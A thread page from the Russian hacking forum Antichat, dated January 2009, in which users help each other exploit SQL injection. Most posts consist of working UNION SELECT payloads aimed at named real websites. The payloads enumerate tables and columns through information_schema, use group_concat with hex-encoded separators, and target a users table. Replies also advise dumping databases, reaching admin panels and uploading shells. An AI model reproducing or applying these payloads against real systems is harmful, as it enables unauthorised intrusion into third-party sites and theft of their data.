ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5131  
Старый 29.01.2009, 06:41
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Читать мою подпись - там на все случаи практически. Или ссылку сюда давай
 
Ответить с цитированием

  #5132  
Старый 29.01.2009, 08:43
Аватар для Octave_Parango
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

Цитата:
Сообщение от jokester  
Octave_Parango Вопрос не понятен, тебе в прошлый раз отвечали, что через GROUP_CONCAT выводится определённое количество символов, сколько именно прописано в group_concat_max_len(по умолчанию 1024), и повлиять на это через инъекцию нельзя, можно только фильтровать данные(тоесть выводить с помощью фильтров, нужных тебе). Ты всегда можешь вывести все данные, не используя GROUP_CONCAT, а используя просто лимит.
name,pass+FROM+table+limit+1,1
В чём вопрос, попробуй переформулировать
Спасибо за ответ.
Можно в таком случае привести пример на моем случае.
Есть порядка 12к записей.
Лимит не работает, просто не выводит данные и я не представляю перебирать лимитов такое количество.

p.s. Возможно я туплю, но что-то реальный ступор у меня...
 
Ответить с цитированием

  #5133  
Старый 29.01.2009, 11:56
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

F4R в слепой скуле только подзапросы, читай статьи по скулям, материала куча, практически в любой статье есть описание работы с подзапросами

Octave_Parango на каком твоём случае нужно превести пример? Ссылки нет. И что значит лимит не работает? Так не бывает к счастью ). Он просто не может не работать. А дамп базы через скуль, это вобщем никогда не было приятной процедурой(особенно когда вывод по одной записи). Скуль для этого вобщем-то не используют в основном. Через неё получают доступ в админку, или напрямую льют шелл, а потом уже дампят базу
 
Ответить с цитированием

  #5134  
Старый 29.01.2009, 12:53
Аватар для je0n
je0n
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521

Репутация: 272
Отправить сообщение для je0n с помощью ICQ
По умолчанию

не пойму как вывести через group_concat(),вот как делаю:
Код:
http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group_concat(table_name%20separator%200?0a),6,7,8,9,10,11,12,13,14,15+from+information_schema.tables--
вот уязвимость без group_concat():
Код:
http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables--
 
Ответить с цитированием

  #5135  
Старый 29.01.2009, 12:56
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=1789 7669898768+union+select+1,2,3,4,group_concat(table _name),6,7,8,9,10,11,12,13,14,15+from+information_ schema.tables--
 
Ответить с цитированием

  #5136  
Старый 29.01.2009, 13:11
Аватар для je0n
je0n
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521

Репутация: 272
Отправить сообщение для je0n с помощью ICQ
По умолчанию

ага) а как разделить сменить на <br>
так получается
Код:
http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group_concat(concat_ws(0x3a,table_name,column_name)+separator+0x3b),6,7,8,9,10,11,12,13,14,15+from+information_schema.columns--
а так нет
Код:
http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group_concat(concat_ws(0x3a,table_name,column_name)+separator+char(60,98,114,62)),6,7,8,9,10,11,12,13,14,15+from+information_schema.columns--
 
Ответить с цитированием

  #5137  
Старый 29.01.2009, 13:16
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Так тебе нужно?
http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=1789 7669898768+union+select+1,2,3,4,group_concat(conca t_ws(0x3a,table_name,column_name)+separator+0x3C62 723E),6,7,8,9,10,11,12,13,14,15+from+information_s chema.columns--
 
Ответить с цитированием

  #5138  
Старый 29.01.2009, 13:45
Аватар для je0n
je0n
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521

Репутация: 272
Отправить сообщение для je0n с помощью ICQ
По умолчанию

Да, это! спасибо!

уммммм,хотелось бы посмотреть как выводить данные по кускам, ибо limit здесь не работает
пробовал substring в запросе - не прокатывает. Почитал о чем эти говорят:
http://forum.antichat.ru/threadnav46016-495-10.html (и предыдущая страница)
выводить только на первую букву тоже не катит если очень большая или мальенькая БД
а о чем еще способ, который предложил l1ght я вообще не вдуплю.
Есть какие предложения?
 
Ответить с цитированием

  #5139  
Старый 29.01.2009, 16:38
Аватар для Ghost0ff
Ghost0ff
Новичок
Регистрация: 18.11.2008
Сообщений: 28
Провел на форуме:
109973

Репутация: 15
Отправить сообщение для Ghost0ff с помощью ICQ
По умолчанию

http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,column_name+from+information_sche ma.columns+where+table_name='jos_users'/* не показывает колонки в табле чо делать?
 
Ответить с цитированием

  #5140  
Старый 29.01.2009, 16:41
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Код:
http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x6A6F735F7573657273/*
Скачать кодировщик

Последний раз редактировалось Pashkela; 29.01.2009 в 17:09..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ